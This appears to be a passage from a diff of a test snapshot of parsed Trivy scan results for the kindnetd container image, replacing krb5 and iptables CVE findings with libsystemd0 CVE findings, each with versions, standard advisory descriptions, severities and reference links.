"https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + ], + }, + "category": "Vulnerability", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "references": [ { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://www.debian.org/security/2021/dsa-4942", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", + ], + }, + "category": "Vulnerability", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "buffer overrun in format_timespan() function", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip6tc2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - 